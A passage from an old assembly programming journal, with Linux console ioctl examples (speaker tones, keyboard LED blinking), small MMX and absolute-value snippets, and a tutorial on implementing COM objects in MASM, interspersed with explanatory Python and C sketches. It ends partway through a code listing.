to be changed without warning. Use POSIX functions.
This is ancient asm coderspeak meaning 'you are on the right track, keep going.'
Perusing the listed requests will provide enough information to code that first
exercise from DOS-ASM 1o1: generating a tone on the PC speaker.
KDMKTONE
Generate tone of specified length. The lower 16
bits of argp specify the period in clock cycles,
and the upper 16 bits give the duration in msec.
If the duration is zero, the sound is turned off.
Control returns immediately. For example, argp =
(125<<16) + 0x637 would specify the beep normally
associated with a ctrl-G. (Thus since 0.99pl1;
broken in 2.1.49-50.)
This should not be too terribly hard to implement -- a call to open the file
descriptor, and a single call to ioctl() to sound the tone. First things first,
open() is called on /dev/tty to create a handle for the current console:
#-------------------------------------------------------------------beep.asm
%define O_RDWR 2 ;grep O_RDWR /usr/include/asm/*
%define KDMKTONE 0x4B30 ;grep KDMKTONE /usr/include/linux/*
EXTERN open
GLOBAL main
section .data
szTTY db '/dev/tty',0
section .text
main:
push dword O_RDWR
push dword szTTY
call open
add esp, 8
#--------------------------------------------------------------------BREAK
Next, calculate the frequency and duration of the tone to be played:
#---------------------------------------------------------------------CONT
mov dx, 666 ;duration
shl edx, 16
or dx, 1199 ;tone
#--------------------------------------------------------------------BREAK
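The three instructions above build the same packed value that the man page describes. As a cross-check, here is a Python sketch of the packing; the helper names are made up, and the 1193180 Hz clock used to turn a frequency into a period is an assumption about the PC timer, not something stated in the man page.

```python
# Assumption: the 'clock cycles' in the man page are ticks of the PC
# timer chip, which runs at roughly 1193180 Hz.
TIMER_HZ = 1193180


def kdmktone_arg(period, duration_ms):
    """Pack period (low 16 bits) and duration in msec (high 16 bits)."""
    if not 0 <= period <= 0xFFFF:
        raise ValueError("period must fit in 16 bits")
    if not 0 <= duration_ms <= 0xFFFF:
        raise ValueError("duration must fit in 16 bits")
    return (duration_ms << 16) | period


def period_for(freq_hz):
    """Timer period for a tone of the given frequency."""
    return round(TIMER_HZ / freq_hz)


# The ctrl-G beep from the man page, and the tone used in beep.asm.
print(hex(kdmktone_arg(0x637, 125)))
print(hex(kdmktone_arg(1199, 666)))
print(period_for(750))
```

With these numbers the value in edx comes out as 029A04AFh, and a period of 1199 corresponds to a tone a little under 1 kHz.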
Now, normally one might call ioctl as so:
push edx
push dword KDMKTONE
push eax
call ioctl
add esp, 12
However, ioctl is a systemcall, and we can save a bit of time by going
straight through the syscall gate at 0x80:
#---------------------------------------------------------------------CONT
mov ebx, eax
mov ecx, KDMKTONE
mov eax, 54 ;ioctl func defined in /usr/include/asm/unistd.h
int 0x80
ret
#----------------------------------------------------------------------EOF
So much for the simple beep. Another ASM 101 favorite is the 'blinking LED'
trick, where students learn to make the keyboard LEDs blink on and off in any
number of psychedelic patterns. A quick tour through the man page shows the
requests needed for this sample as well:
KDGETLED
Get state of LEDs. argp points to a long int. The
lower three bits of *argp are set to the state of
the LEDs, as follows:
LED_CAP 0x04 caps lock led
LED_NUM 0x02 num lock led
LED_SCR 0x01 scroll lock led
KDSETLED
Set the LEDs. The LEDs are set to correspond to
the lower three bits of argp. However, if a higher
order bit is set, the LEDs revert to normal: dis-
playing the state of the keyboard functions of caps
lock, num lock, and scroll lock.
The file descriptor must be opened as with the previous example. From there,
we must get the current LED state:
#--------------------------------------------------------------------led.asm
%define KDGETLED 0x4B31 ;grep KDGETLED /usr/include/linux/*
%define KDSETLED 0x4B32 ;grep KDSETLED /usr/include/linux/*
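mov ebx, eax ;file descriptor returned by open()
push dword 0 ;reserve a dword on the stack for the result
mov edx, esp ;argp must point to the buffer that receives the state
mov ecx, KDGETLED
mov eax, 54
int 0x80
pop edx ;edx = current LED state in the lower three bits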
#--------------------------------------------------------------------BREAK
Next, all of the LEDs will be turned on and then off 10 times. It is vital
to the success of the algorithm that a delay be present between the off and
on transitions; otherwise the LEDs will appear to be steadily lit, and that
is much less of a programming achievement:
#---------------------------------------------------------------------CONT
mov ecx, 10
.here:
push ecx ;save counter
or edx, 0x07 ;set all of 'em
mov ecx, KDSETLED
mov eax, 54
int 0x80
mov ecx, 0xFFFFFF ;delay counter
.delay:
loop .delay
and edx, 0 ;turn all of them off
mov ecx, KDSETLED
mov eax, 54
int 0x80
mov ecx, 0xFFFFFF ;next delay counter
.delay2:
loop .delay2
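pop ecx
loop .here
mov edx, 0x08 ;a higher-order bit hands the LEDs back to the keyboard
mov ecx, KDSETLED
mov eax, 54
int 0x80
ret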
#----------------------------------------------------------------------EOF
Blinking the LEDs in succession and achieving hypnotic frequency via ioctl()
will be left as an exercise to the reader.
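As a starting point for that exercise, the bit values from the man page can be played with outside of assembler first. This Python sketch only computes the values one would hand to KDSETLED; it does not touch the keyboard, and the function names and the num/caps/scroll ordering are choices made for this example.

```python
# LED bits as listed in the console_ioctl man page.
LED_SCR = 0x01  # scroll lock led
LED_NUM = 0x02  # num lock led
LED_CAP = 0x04  # caps lock led


def led_names(state):
    """Decode the lower three bits of a KDGETLED result."""
    names = []
    if state & LED_SCR:
        names.append("scroll")
    if state & LED_NUM:
        names.append("num")
    if state & LED_CAP:
        names.append("caps")
    return names


def chase(rounds):
    """KDSETLED arguments that light one LED at a time, left to right."""
    return [led for _ in range(rounds)
            for led in (LED_NUM, LED_CAP, LED_SCR)]


print(led_names(0x05))
print(chase(2))
```

Each value in the list would go into edx before the KDSETLED call, with a delay in between as in the listing above.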
This should provide a quick introduction to using ioctl(). There are many more
possibilities available for scan codes, screen painting, and virtual console
control; further opportunities for console amusement exist also within the realm
of escape-sequence programming. The examples presented here can be compiled with
the standard
nasm -f elf file.asm
gcc -o file file.o
combination, or by using a Makefile:
#----------------------------------------------------------------------Makefile
# Comments sit on their own lines: make would keep the blanks in front of a
# trailing '#' as part of the value, turning $(TARGET).asm into 'beep .asm'.
# TARGET is the variable storing the base filename
TARGET = beep
# ASM contains the name of the assembler
ASM = nasm
# ASMFILE and OBJFILE contain the full names of the source and object files
ASMFILE = $(TARGET).asm
OBJFILE = $(TARGET).o
# LINKER contains the name of the linker
LINKER = gcc
# LIBS contains any library flags, LIBDIR any library location flags
LIBS =
LIBDIR =
# the 'all' target is what a plain 'make' builds; recipe lines start with a tab
all:
	$(ASM) -o $(OBJFILE) -f elf $(ASMFILE)
	$(LINKER) -o $(TARGET) $(OBJFILE) $(LIBDIR) $(LIBS)
#---------------------------------------------------------------------------EOF
As with all Makefiles, with the target correctly set the source will be compiled
and linked simply by typing 'make' in the directory where the Makefile is
located.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
BinToString
by Cecchinel Stephan
;Summary: Converts a 32 bit number to an 8-byte string.
;Compatibility: MMX+
;Notes: 14 cycles. Input is stored in EAX; the output is a hex-
; format character string pointed to by [EDI].
Sum1: dd 0x30303030, 0x30303030
Mask1: dd 0x0f0f0f0f, 0x0f0f0f0f
Comp1: dd 0x09090909, 0x09090909
Hex32:
bswap eax
movq mm3,[Sum1]
movq mm4,[Comp1]
movq mm2,[Mask1]
movq mm5,mm3
psubb mm5,mm4
movd mm0,eax
movq mm1,mm0
psrlq mm0,4
pand mm0,mm2
pand mm1,mm2
punpcklbw mm0,mm1
movq mm1,mm0
pcmpgtb mm0,mm4
pand mm0,mm5
paddb mm1,mm3
paddb mm1,mm0
movq [edi],mm1
ret
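To follow what the MMX registers hold at each step, it can help to replay the routine one byte at a time. The Python sketch below is a model of the same steps (byte swap, nibble split, interleave, compare against 9, add '0' plus a correction of 27h), not a replacement for the routine; the function name hex32 is simply borrowed from the label above.

```python
def hex32(value):
    """Byte-by-byte model of the Hex32 routine: 32-bit value -> 8 hex chars."""
    value &= 0xFFFFFFFF
    # bswap + store: the most significant byte ends up first in memory.
    swapped = value.to_bytes(4, "big")
    out = bytearray()
    for byte in swapped:
        # psrlq/pand give the high nibbles, pand alone the low nibbles;
        # punpcklbw interleaves them as high, low, high, low, ...
        for nibble in ((byte >> 4) & 0x0F, byte & 0x0F):
            # pcmpgtb against 9 selects the digits that need a letter;
            # Sum1 - Comp1 = 30h - 09h = 27h is the extra amount they get.
            adjust = 0x27 if nibble > 9 else 0x00
            out.append(0x30 + nibble + adjust)
    return bytes(out)


print(hex32(0x1234ABCD))
```

Note that the letters come out in lower case, and that the 8 bytes written to [EDI] are not followed by a terminator.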
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
Absolute Value
by Laura Fairhead
The Challenge
-------------
Find the absolute value of a register in only 4 bytes.
The Solution
------------
NEG AX
JL SHORT $-2 ; back to the NEG ($ is the JL itself; encoded as 7C FC)
This was not completely my original idea (is there such thing??); I
found a similar sequence which used the more obvious branch 'JS'. The
JS had the problem that it goes into an infinite loop if AX=08000h.
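The difference between the two branches is easy to see when the flags are written out. Here is a small Python sketch of a 16-bit NEG and the two jump conditions; it is a model for illustration only, and the iteration limit exists purely so that the endless loop can be shown without hanging.

```python
def neg16(ax):
    """16-bit NEG: returns (result, sign flag, overflow flag)."""
    result = (-ax) & 0xFFFF
    sf = bool(result & 0x8000)
    of = ax == 0x8000          # only -32768 overflows when negated
    return result, sf, of


def abs16(ax, use_js=False, max_iterations=4):
    """Run 'NEG AX / Jcc back' until the branch falls through."""
    for _ in range(max_iterations):
        ax, sf, of = neg16(ax)
        # JL is taken when SF differs from OF; JS when SF is set.
        taken = sf if use_js else (sf != of)
        if not taken:
            return ax
    raise RuntimeError("branch never falls through")


print(abs16(5), abs16(0xFFFB), hex(abs16(0x8000)))
```

Calling abs16(0x8000, use_js=True) raises the RuntimeError, which is the model's way of showing the infinite loop mentioned above.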
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. July-Sep 99
:::\_____\::::::::::. Issue 5
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.com asmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"COM in Assembly Part II"...................................Bill.Tyler
"How to use DirectDraw in ASM"...............................X-Calibre
"Writing Boot Sectors To Disk"...........................Jan.Verhoeven
"Dumping Memory to Disk".................................Jan.Verhoeven
"Formatted Numeric Output"..............................Laura.Fairhead
"Linked Lists in ASM"..........................................mammon_
Column: Win32 Assembly Programming
"Structured Exception Handling under Win32"...........Chris.Dragan
"Child Window Controls"...................................Iczelion
"Dialog Box as Main Window"...............................Iczelion
"Standardizing Win32 Callback Procedures"............Jeremy.Gordon
Column: The Unix World
"Fire Demo ported to Linux SVGAlib".................Jan.Wagemakers
Column: Assembly Language Snippets
"Abs".................................................Chris.Dragan
"Min".................................................Chris.Dragan
"Max".................................................Chris.Dragan
"OBJECT"...................................................mammon_
Column: Issue Solution
"Binary to ASCII"....................................Jan.Verhoeven
----------------------------------------------------------------------
++++++++++++++++++Issue Challenge+++++++++++++++++
Convert a bit value to ASCII in less than 10 bytes
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
I suppose I should start with the good news. A week or so ago Hiroshimator
emailed me for the nth time asking if I needed help with the journal as I have
yet to get one out on time. I relented and asked if he knew any listservers;
one hour later he had an account for APJ set up at e-groups, specifically:
http://www.egroups.com/group/apj-announce
One of the greatest obstacles to putting out these issues -- processing the
300 or so subscription requests that rack up between issues -- is now out of
the way for good.
The articles this month have somewhat of a high-level focus; with the COM and
DirectDraw articles by Bill Tyler and X-Calibre, respectively, as well as Chris
Dragan's classic work on exception handling and Jeremy Gordon's treatment of
Windows callbacks, this issue is heavily weighted towards high-level win32
coding. Add to this Iczelion's two tutorials and my own win32-biased
linked list example, and it appears the DOS/Unix camp is losing ground.
To shore up the Unix front line, Jan Wagemakers has provided a port of last
month's fire demo to linux [GAS]. In addition, there are A86 articles by Jan
Verhoeven and a general assembly routine by Laura Fairhead to prove that not
all assembly has to be 32-bit.
And, finally, I am looking for a good 'challenge' columnist: someone to write
the monthly APJ challenges [and their solutions] so that I can start
announcing next month's challenge sooner than next month...
Now at last I can sleep ;)
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
COM in Assembly Part II
by Bill Tyler
My previous article described how to use COM objects in your assembly
language programs. It described only how to call COM methods, but not how to
create your own COM objects. This article will describe how to do that.
This article will describe implementing COM objects, using MASM syntax. TASM
or NASM assemblers will not be considered; however, the methods can be easily
applied to any assembler.
This article will also not describe some of the more advanced features of COM
such as reuse, threading, servers/clients, and so on. These will be presented
in future articles.
COM Interfaces Review
------------------------------------------------------------------------------
An interface definition specifies the interface's methods, their return types,
the number and types of their parameters, and what the methods must do. Here
is a sample interface definition:
IInterface struct
lpVtbl dd ?
IInterface ends
IInterfaceVtbl struct
; IUnknown methods
STDMETHOD QueryInterface, :DWORD, :DWORD, :DWORD
STDMETHOD AddRef, :DWORD
STDMETHOD Release, :DWORD
; IInterface methods
STDMETHOD Method1, :DWORD
STDMETHOD Method2, :DWORD
IInterfaceVtbl ends
STDMETHOD is used to simplify the interface declaration, and is defined as:
STDMETHOD MACRO name, argl :VARARG
LOCAL @tmp_a
LOCAL @tmp_b
@tmp_a TYPEDEF PROTO argl
@tmp_b TYPEDEF PTR @tmp_a
name @tmp_b ?
ENDM
This macro is used to greatly simplify interface declarations, and so that the
MASM invoke syntax can be used. (Macro originally by Ewald :)
Access to the interface's methods occurs through a pointer. This pointer
points to a table of function pointers, called a vtable. Here is a sample
method call:
mov eax, [lpif] ; lpif is the interface pointer
mov eax, [eax] ; get the address of the vtable
invoke (IInterfaceVtbl ptr [eax]).Method1, [lpif] ; indirect call to the function
- or -
invoke [eax][IInterfaceVtbl.Method2], [lpif] ; alternate notation
Two different styles of addressing the members are shown. Both notations
produce equivalent code, so the method used is a matter of personal
preference.
All interfaces must inherit from the IUnknown interface. This means that the
first 3 methods of the vtable must be QueryInterface, AddRef, and Release.
The purpose and implementation of these methods will be discussed later.
GUIDS
------------------------------------------------------------------------------
A GUID is a Globally Unique ID: a 16-byte number that is unique to an
interface. COM uses GUIDs to tell interfaces apart. Using this method prevents
name clashing as well as version clashing. To get a GUID, you use a generator
utility that is included with most win32 development packages.
A GUID is represented by the following structure:
GUID STRUCT
Data1 dd ?
Data2 dw ?
Data3 dw ?
Data4 db 8 dup(?)
GUID ENDS
A GUID is then defined in the data section:
MyGUID GUID <3F2504E0h, 4f89h, 11D3h, <9Ah, 0C3h, 0h, 0h, 0E8h, 2Ch, 3h, 1h>>
Once a GUID is assigned to an interface and published, no further changes to
the interface definition are allowed. Note that this does not mean that the
interface implementation may not change; only the definition is frozen. For
changes to the interface definition, a new GUID must be assigned.
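To see how the structure above maps onto 16 bytes of memory, the sample MyGUID can be packed with the same field sizes. This is a Python sketch for inspection only; pack_guid is a name invented here, and the little-endian layout is the one an x86 assembler produces for dd and dw.

```python
import struct
import uuid


def pack_guid(data1, data2, data3, data4):
    """Lay out a GUID as dd, dw, dw, db 8 dup(?) in little-endian memory."""
    data4 = bytes(data4)
    if len(data4) != 8:
        raise ValueError("Data4 must be exactly 8 bytes")
    return struct.pack("<IHH8s", data1, data2, data3, data4)


# The sample GUID defined in the data section above.
MY_GUID = pack_guid(0x3F2504E0, 0x4F89, 0x11D3,
                    [0x9A, 0xC3, 0x00, 0x00, 0xE8, 0x2C, 0x03, 0x01])

# uuid.UUID(bytes_le=...) reads exactly this memory layout.
as_text = str(uuid.UUID(bytes_le=MY_GUID))

print(len(MY_GUID), MY_GUID.hex())
print(as_text)
```

The textual form is the one that registry entries and generator utilities display, which makes it handy for comparing a hand-typed definition against the original.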
COM Objects
------------------------------------------------------------------------------
A COM object is simply an implementation of an interface. Implementation
details are not covered by the COM standard, so we are free to implement our
objects as we choose, so long as they satisfy all the requirements of the
interface definition.
A typical object will contain pointers to the various interfaces it supports,
a reference count, and any other data that the object needs. Here is a sample
object definition, implemented as a structure:
Object struct
interface IInterface <?> ; pointer to an IInterface
nRefCount dd ? ; reference count
nValue dd ? ; private object data
Object ends
We also have to define the vtables we are going to be using. These tables
must be static, and cannot change during run-time. Each member of the vtable
is a pointer to a method. Following is a method for defining the vtable.
@@IInterface segment dword
vtblIInterface:
dd offset IInterface@QueryInterface
dd offset IInterface@AddRef
dd offset IInterface@Release
dd offset IInterface@GetValue
dd offset IInterface@SetValue
@@IInterface ends
Reference Counting
------------------------------------------------------------------------------
COM objects manage their lifetimes through reference counting. Each object
maintains a reference count that keeps track of how many instances of the
interface pointer have been created. The object is required to keep a
counter that supports 2^32 instances, meaning the reference count must be a
DWORD.
When the reference count drops to zero, the object is no longer in use, and
it destroys itself. The 2 IUnknown methods AddRef and Release handle the
reference counting for a COM object.
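The lifetime rule can be stated in a handful of lines. The following Python sketch only models the counting; the class and attribute names are made up, and the destroyed flag stands in for whatever the real object does to free itself.

```python
class CountedObject:
    """Model of an object whose lifetime is driven by AddRef/Release."""

    def __init__(self):
        self.ref_count = 0      # plays the role of nRefCount (a DWORD)
        self.destroyed = False  # stands in for freeing the memory

    def add_ref(self):
        """One more copy of the interface pointer exists."""
        self.ref_count = (self.ref_count + 1) & 0xFFFFFFFF
        return self.ref_count

    def release(self):
        """One copy of the interface pointer is gone."""
        self.ref_count -= 1
        if self.ref_count == 0:
            self.destroyed = True
        return self.ref_count


obj = CountedObject()
obj.add_ref()          # first client
obj.add_ref()          # second client
obj.release()          # first client is done: object stays alive
alive_after_first = not obj.destroyed
obj.release()          # last client is done: object destroys itself
print(alive_after_first, obj.destroyed)
```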
QueryInterface
------------------------------------------------------------------------------
The QueryInterface method is used by a client of a COM object to determine if
the object supports a given interface, and then if supported, to get the
interface pointer. There are 3 rules to implementing the QueryInterface method:
1. Objects must have an identity - a call to QueryInterface for IUnknown must
always return the same pointer value.
2. The set of interfaces of an object must never change - for example, if
a call to QueryInterface with a given IID succeeds once, it must succeed
always. Likewise, if it fails once, it must fail always.
3. It must be possible to successfully query an interface of an object
from any other interface.
QueryInterface returns a pointer to a specified interface on an object to
which a client currently holds an interface pointer. This function must call
the AddRef method on the pointer it returns.
Following are the QueryInterface parameters:
pif : [in] a pointer to the calling interface
riid : [in] pointer to the IID of the interface being queried
ppv : [out] pointer to the pointer of the interface that is to be set.
If the interface is not supported, the pointed to value is set to 0
QueryInterface returns the following:
S_OK if the interface is supported
E_NOINTERFACE if not supported
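Before looking at the assembly version, the contract can be summarised in a short model. This Python sketch is an illustration under assumptions: IIDs are plain strings instead of 16-byte GUIDs, the out parameter ppv becomes a second return value, and the class name is hypothetical. The two HRESULT values are the standard ones.

```python
S_OK = 0x00000000
E_NOINTERFACE = 0x80004002


class SketchObject:
    """Model of an object exposing IUnknown and IInterface."""

    # Fixed for the lifetime of the object (rule 2).
    SUPPORTED = frozenset({"IID_IUnknown", "IID_IInterface"})

    def __init__(self):
        self.ref_count = 0

    def add_ref(self):
        self.ref_count += 1
        return self.ref_count

    def query_interface(self, iid):
        """Return (hresult, pointer); pointer is None when unsupported."""
        if iid in self.SUPPORTED:
            # Both interfaces share one pointer here, as in the article,
            # and every pointer handed out is counted.
            self.add_ref()
            return S_OK, self
        return E_NOINTERFACE, None


obj = SketchObject()
hr1, p1 = obj.query_interface("IID_IUnknown")
hr2, p2 = obj.query_interface("IID_IInterface")
hr3, p3 = obj.query_interface("IID_ISomethingElse")
print(hex(hr1), hex(hr2), hex(hr3), obj.ref_count)
```

A failed query leaves the reference count alone, while every successful one raises it by one; the caller owes a Release for each pointer it received.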
Here is a simple assembly implementation of QueryInterface:
IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
; The following compares the requested IID with the available ones.
; In this case, because IInterface inherits from IUnknown, the IInterface
; interface is prefixed with the IUnknown methods, and these 2 interfaces
; share the same interface pointer.
invoke IsEqualGUID, [riid], addr IID_IInterface
or eax,eax
jnz @1
invoke IsEqualGUID, [riid], addr IID_IUnknown
or eax,eax
jnz @1
jmp @NoInterface
@1:
; GETOBJECTPOINTER is a macro that will put the object pointer into eax,
; when given the name of the object, the name of the interface, and the
; interface pointer.
GETOBJECTPOINTER Object, interface, pif
; now get the pointer to the requested interface
lea eax, (Object ptr [eax]).interface
; set *ppv with this interface pointer
mov ebx, [ppv]
mov dword ptr [ebx], eax
; increment the reference count by calling AddRef
GETOBJECTPOINTER Object, interface, pif
mov eax, (Object ptr [eax]).interface
invoke (IInterfaceVtbl ptr [eax]).AddRef, pif
; return S_OK
mov eax, S_OK
jmp return
@NoInterface:
; interface not supported, so set *ppv to zero
mov eax, [ppv]
mov dword ptr [eax], 0
; return E_NOINTERFACE
mov eax, E_NOINTERFACE
return:
ret
IInterface@QueryInterface endp
AddRef
------------------------------------------------------------------------------
The AddRef method is used to increment the reference count for an interface
of an object. It should be called for every new copy of an interface pointer
to an object.
AddRef takes no parameters, other than the interface pointer required for all
methods. AddRef should return the new reference count. However, this value
is to be used by callers only for testing purposes, as it may be unstable in
certain situations.
Following is a simple implementation of the AddRef method:
IInterface@AddRef proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
; increment the reference count
inc [(Object ptr [eax]).nRefCount]
; now return the count
mov eax, [(Object ptr [eax]).nRefCount]
ret
IInterface@AddRef endp
Release
------------------------------------------------------------------------------
Release decrements the reference count for the calling interface on an object.
If the reference count on the object is decremented to 0, then the object is
freed from memory. This function should be called when you no longer need to
use an interface pointer.
Like AddRef, Release takes only one parameter - the interface pointer. It
also returns the current value of the reference count, which, similarly, is to
be used for testing purposes only.
Here is a simple implementation of Release:
IInterface@Release proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
; decrement the reference count
dec [(Object ptr [eax]).nRefCount]
; check to see if the reference count is zero. If it is, then destroy
; the object.
mov eax, [(Object ptr [eax]).nRefCount]
or eax, eax
jnz @1
; free the object: here we have assumed the object was allocated with
; LocalAlloc and with LMEM_FIXED option
GETOBJECTPOINTER Object, interface, pif
invoke LocalFree, eax
@1:
ret
IInterface@Release endp
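For readers who find the counting rules easier to follow in C, here is a minimal sketch of the same AddRef/Release pairing. The names (Counted, counted_add_ref, counted_release, freed_flag) are hypothetical and only illustrate the idea; malloc/free stand in for LocalAlloc/LocalFree.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical object: only the reference count matters here. */
typedef struct Counted {
    unsigned long ref_count;   /* plays the role of nRefCount */
    int *freed_flag;           /* optional: set to 1 when the object is freed */
} Counted;

/* Allocate an object with a reference count of zero. */
static Counted *counted_new(int *freed_flag)
{
    Counted *obj = malloc(sizeof *obj);
    if (obj != NULL) {
        obj->ref_count = 0;
        obj->freed_flag = freed_flag;
    }
    return obj;
}

/* AddRef: one more copy of the pointer exists; return the new count. */
static unsigned long counted_add_ref(Counted *obj)
{
    assert(obj != NULL);
    return ++obj->ref_count;
}

/* Release: one copy is gone; free the object when the count reaches zero. */
static unsigned long counted_release(Counted *obj)
{
    unsigned long remaining;

    assert(obj != NULL && obj->ref_count > 0);
    remaining = --obj->ref_count;
    if (remaining == 0) {
        if (obj->freed_flag != NULL)
            *obj->freed_flag = 1;
        free(obj);
    }
    return remaining;
}
```

Every counted_add_ref must be balanced by exactly one counted_release; after the call that returns 0 the pointer must not be used again.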
Creating a COM object
------------------------------------------------------------------------------
Creating an object consists basically of allocating the memory for the
object, and then initializing its data members. Typically, the vtable
pointer is initialized and the reference count is zeroed. QueryInterface
could then be called to get the interface pointer.
Other methods exist for creating objects, such as using CoCreateInstance, and
using class factories. These methods will not be discussed, and may be a
topic for a future article.
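The creation steps, and the pointer arithmetic behind GETOBJECTPOINTER, can be sketched in C as follows. This is an illustration under assumptions, not the article's implementation: the type and function names are made up, a padding field is added only to make the interface offset non-zero, and a direct AddRef call stands in for the QueryInterface call.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

typedef struct IfaceVtbl IfaceVtbl;

/* An interface is just a pointer to a table of function pointers. */
typedef struct Iface {
    const IfaceVtbl *lpVtbl;
} Iface;

struct IfaceVtbl {
    unsigned long (*AddRef)(Iface *pif);
    int (*GetValue)(Iface *pif);
};

/* The object embeds the interface and keeps its private data next to it. */
typedef struct Obj {
    int padding;              /* hypothetical: forces a non-zero interface offset */
    Iface iface;
    unsigned long ref_count;
    int value;
} Obj;

/* Same idea as GETOBJECTPOINTER: subtract the interface's offset. */
static Obj *object_from_iface(Iface *pif)
{
    assert(pif != NULL);
    return (Obj *)((char *)pif - offsetof(Obj, iface));
}

static unsigned long obj_add_ref(Iface *pif)
{
    return ++object_from_iface(pif)->ref_count;
}

static int obj_get_value(Iface *pif)
{
    return object_from_iface(pif)->value;
}

static const IfaceVtbl obj_vtbl = { obj_add_ref, obj_get_value };

/* Allocate, set the vtable pointer, zero the count, hand out one reference. */
static Iface *create_object(int initial_value)
{
    Obj *obj = malloc(sizeof *obj);
    if (obj == NULL)
        return NULL;
    obj->padding = 0;
    obj->iface.lpVtbl = &obj_vtbl;
    obj->ref_count = 0;
    obj->value = initial_value;
    obj->iface.lpVtbl->AddRef(&obj->iface);  /* stands in for QueryInterface */
    return &obj->iface;
}
```

The caller only ever sees the Iface pointer; the methods recover the full object from it.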
COM implementation sample application
------------------------------------------------------------------------------
Here follows a sample implementation and usage of a COM object. It shows how
to create the object, call its methods, then free it. It would probably be
very educational to assemble this and run it through a debugger. This and
other examples can be found at http://asm.tsx.org.
.386
.model flat,stdcall
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
includelib uuid.lib
;-----------------------------------------------------------------------------
; Macro to simplify interface declarations
; Borrowed from Ewald, http://here.is/diamond/
STDMETHOD MACRO name, argl :VARARG
LOCAL @tmp_a
LOCAL @tmp_b
@tmp_a TYPEDEF PROTO argl
@tmp_b TYPEDEF PTR @tmp_a
name @tmp_b ?
ENDM
; Macro that takes an interface pointer and returns the implementation
; pointer in eax
GETOBJECTPOINTER MACRO Object, Interface, pif
mov eax, pif
IF (Object.Interface)
sub eax, Object.Interface
ENDIF
ENDM
;-----------------------------------------------------------------------------
IInterface@QueryInterface proto :DWORD, :DWORD, :DWORD
IInterface@AddRef proto :DWORD
IInterface@Release proto :DWORD
IInterface@GetValue proto :DWORD
IInterface@SetValue proto :DWORD, :DWORD
CreateObject proto :DWORD
IsEqualGUID proto :DWORD, :DWORD
externdef IID_IUnknown:GUID
;-----------------------------------------------------------------------------
; declare the interface prototype
IInterface struct
lpVtbl dd ?
IInterface ends
IInterfaceVtbl struct
; IUnknown methods
STDMETHOD QueryInterface, pif:DWORD, riid:DWORD, ppv:DWORD
STDMETHOD AddRef, pif:DWORD
STDMETHOD Release, pif:DWORD
; IInterface methods
STDMETHOD GetValue, pif:DWORD
STDMETHOD SetValue, pif:DWORD, val:DWORD
IInterfaceVtbl ends
; declare the object structure
Object struct
; interface object
interface IInterface <?>
; object data
nRefCount dd ?
nValue dd ?
Object ends
;-----------------------------------------------------------------------------
.data
; define the vtable
@@IInterface segment dword
vtblIInterface:
dd offset IInterface@QueryInterface
dd offset IInterface@AddRef
dd offset IInterface@Release
dd offset IInterface@GetValue
dd offset IInterface@SetValue
@@IInterface ends
; define the interface's IID
; {CF2504E0-4F89-11d3-9AC3-0000E82C0301}
IID_IInterface GUID <0cf2504e0h, 04f89h, 011d3h, <09ah, 0c3h, 00h, 00h,
0e8h, 02ch, 03h, 01h>>
;-----------------------------------------------------------------------------
.code
start:
StartProc proc
LOCAL pif:DWORD ; interface pointer
; create the object
invoke CreateObject, addr [pif]
or eax,eax
js exit
; call the SetValue method
mov eax, [pif]
mov eax, [eax]
invoke (IInterfaceVtbl ptr [eax]).SetValue, [pif], 12345h
; call the GetValue method
mov eax, [pif]
mov eax, [eax]
invoke (IInterfaceVtbl ptr [eax]).GetValue, [pif]
; release the object
mov eax, [pif]
mov eax, [eax]
invoke (IInterfaceVtbl ptr [eax]).Release, [pif]
exit:
ret
StartProc endp
;-----------------------------------------------------------------------------
IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
invoke IsEqualGUID, [riid], addr IID_IInterface
test eax,eax
jnz @F
invoke IsEqualGUID, [riid], addr IID_IUnknown
test eax,eax
jnz @F
jmp @Error
@@:
GETOBJECTPOINTER Object, interface, pif
lea eax, (Object ptr [eax]).interface
; set *ppv
mov ebx, [ppv]
mov dword ptr [ebx], eax
; increment the reference count
GETOBJECTPOINTER Object, interface, pif
mov eax, (Object ptr [eax]).interface
invoke (IInterfaceVtbl ptr [eax]).AddRef, [pif]
; return S_OK
mov eax, S_OK
jmp return
@Error:
; error, interface not supported
mov eax, [ppv]
mov dword ptr [eax], 0
mov eax, E_NOINTERFACE
return:
ret
IInterface@QueryInterface endp
IInterface@AddRef proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
inc [(Object ptr [eax]).nRefCount]
mov eax, [(Object ptr [eax]).nRefCount]
ret
IInterface@AddRef endp
IInterface@Release proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
dec [(Object ptr [eax]).nRefCount]
mov eax, [(Object ptr [eax]).nRefCount]
or eax, eax
jnz @1
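; free object: pif points at the interface, and [pif] is the vtable pointer,
; so recover the pointer to the allocated object before freeing it
GETOBJECTPOINTER Object, interface, pif
invoke LocalFree, eax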
@1:
ret
IInterface@Release endp
IInterface@GetValue proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
mov eax, (Object ptr [eax]).nValue
ret
IInterface@GetValue endp
IInterface@SetValue proc uses ebx pif:DWORD, val:DWORD
